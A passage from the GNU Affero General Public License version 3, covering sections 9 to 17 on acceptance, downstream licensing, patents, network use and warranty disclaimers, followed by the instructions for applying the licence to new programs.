You are not required to accept this License in order to receive or
run a copy of the Program. Ancillary propagation of a covered work
occurring solely as a consequence of using peer-to-peer transmission
to receive a copy likewise does not require acceptance. However,
nothing other than this License grants you permission to propagate or
modify any covered work. These actions infringe copyright if you do
not accept this License. Therefore, by modifying or propagating a
covered work, you indicate your acceptance of this License to do so.
10. Automatic Licensing of Downstream Recipients.
Each time you convey a covered work, the recipient automatically
receives a license from the original licensors, to run, modify and
propagate that work, subject to this License. You are not responsible
for enforcing compliance by third parties with this License.
An "entity transaction" is a transaction transferring control of an
organization, or substantially all assets of one, or subdividing an
organization, or merging organizations. If propagation of a covered
work results from an entity transaction, each party to that
transaction who receives a copy of the work also receives whatever
licenses to the work the party's predecessor in interest had or could
give under the previous paragraph, plus a right to possession of the
Corresponding Source of the work from the predecessor in interest, if
the predecessor has it or can get it with reasonable efforts.
You may not impose any further restrictions on the exercise of the
rights granted or affirmed under this License. For example, you may
not impose a license fee, royalty, or other charge for exercise of
rights granted under this License, and you may not initiate litigation
(including a cross-claim or counterclaim in a lawsuit) alleging that
any patent claim is infringed by making, using, selling, offering for
sale, or importing the Program or any portion of it.
11. Patents.
A "contributor" is a copyright holder who authorizes use under this
License of the Program or a work on which the Program is based. The
work thus licensed is called the contributor's "contributor version".
A contributor's "essential patent claims" are all patent claims
owned or controlled by the contributor, whether already acquired or
hereafter acquired, that would be infringed by some manner, permitted
by this License, of making, using, or selling its contributor version,
but do not include claims that would be infringed only as a
consequence of further modification of the contributor version. For
purposes of this definition, "control" includes the right to grant
patent sublicenses in a manner consistent with the requirements of
this License.
Each contributor grants you a non-exclusive, worldwide, royalty-free
patent license under the contributor's essential patent claims, to
make, use, sell, offer for sale, import and otherwise run, modify and
propagate the contents of its contributor version.
In the following three paragraphs, a "patent license" is any express
agreement or commitment, however denominated, not to enforce a patent
(such as an express permission to practice a patent or covenant not to
sue for patent infringement). To "grant" such a patent license to a
party means to make such an agreement or commitment not to enforce a
patent against the party.
If you convey a covered work, knowingly relying on a patent license,
and the Corresponding Source of the work is not available for anyone
to copy, free of charge and under the terms of this License, through a
publicly available network server or other readily accessible means,
then you must either (1) cause the Corresponding Source to be so
available, or (2) arrange to deprive yourself of the benefit of the
patent license for this particular work, or (3) arrange, in a manner
consistent with the requirements of this License, to extend the patent
license to downstream recipients. "Knowingly relying" means you have
actual knowledge that, but for the patent license, your conveying the
covered work in a country, or your recipient's use of the covered work
in a country, would infringe one or more identifiable patents in that
country that you have reason to believe are valid.
If, pursuant to or in connection with a single transaction or
arrangement, you convey, or propagate by procuring conveyance of, a
covered work, and grant a patent license to some of the parties
receiving the covered work authorizing them to use, propagate, modify
or convey a specific copy of the covered work, then the patent license
you grant is automatically extended to all recipients of the covered
work and works based on it.
A patent license is "discriminatory" if it does not include within
the scope of its coverage, prohibits the exercise of, or is
conditioned on the non-exercise of one or more of the rights that are
specifically granted under this License. You may not convey a covered
work if you are a party to an arrangement with a third party that is
in the business of distributing software, under which you make payment
to the third party based on the extent of your activity of conveying
the work, and under which the third party grants, to any of the
parties who would receive the covered work from you, a discriminatory
patent license (a) in connection with copies of the covered work
conveyed by you (or copies made from those copies), or (b) primarily
for and in connection with specific products or compilations that
contain the covered work, unless you entered into that arrangement,
or that patent license was granted, prior to 28 March 2007.
Nothing in this License shall be construed as excluding or limiting
any implied license or other defenses to infringement that may
otherwise be available to you under applicable patent law.
12. No Surrender of Others' Freedom.
If conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot convey a
covered work so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you may
not convey it at all. For example, if you agree to terms that obligate you
to collect a royalty for further conveying from those to whom you convey
the Program, the only way you could satisfy both those terms and this
License would be to refrain entirely from conveying the Program.
13. Remote Network Interaction; Use with the GNU General Public License.
Notwithstanding any other provision of this License, if you modify the
Program, your modified version must prominently offer all users
interacting with it remotely through a computer network (if your version
supports such interaction) an opportunity to receive the Corresponding
Source of your version by providing access to the Corresponding Source
from a network server at no charge, through some standard or customary
means of facilitating copying of software. This Corresponding Source
shall include the Corresponding Source for any work covered by version 3
of the GNU General Public License that is incorporated pursuant to the
following paragraph.
Notwithstanding any other provision of this License, you have
permission to link or combine any covered work with a work licensed
under version 3 of the GNU General Public License into a single
combined work, and to convey the resulting work. The terms of this
License will continue to apply to the part which is the covered work,
but the work with which it is combined will remain governed by version
3 of the GNU General Public License.
14. Revised Versions of this License.
The Free Software Foundation may publish revised and/or new versions of
the GNU Affero General Public License from time to time. Such new versions
will be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the
Program specifies that a certain numbered version of the GNU Affero General
Public License "or any later version" applies to it, you have the
option of following the terms and conditions either of that numbered
version or of any later version published by the Free Software
Foundation. If the Program does not specify a version number of the
GNU Affero General Public License, you may choose any version ever published
by the Free Software Foundation.
If the Program specifies that a proxy can decide which future
versions of the GNU Affero General Public License can be used, that proxy's
public statement of acceptance of a version permanently authorizes you
to choose that version for the Program.
Later license versions may give you additional or different
permissions. However, no additional obligations are imposed on any
author or copyright holder as a result of your choosing to follow a
later version.
15. Disclaimer of Warranty.
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
16. Limitation of Liability.
IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.
17. Interpretation of Sections 15 and 16.
If the disclaimer of warranty and limitation of liability provided
above cannot be given local legal effect according to their terms,
reviewing courts shall apply local law that most closely approximates
an absolute waiver of all civil liability in connection with the
Program, unless a warranty or assumption of liability accompanies a
copy of the Program in return for a fee.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
state the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published
by the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.
Also add information on how to contact you by electronic and paper mail.
If your software can interact with users remotely through a computer
network, you should also make sure that it provides a way for users to
get its source. For example, if your program is a web application, its
interface could display a "Source" link that leads users to an archive
of the code. There are many ways you could offer source, and different
solutions will be better for different programs; see section 13 for the
specific requirements.
You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary.
For more information on this, and how to apply and follow the GNU AGPL, see
<https://www.gnu.org/licenses/>.

Some files were not shown because too many files have changed in this diff Show More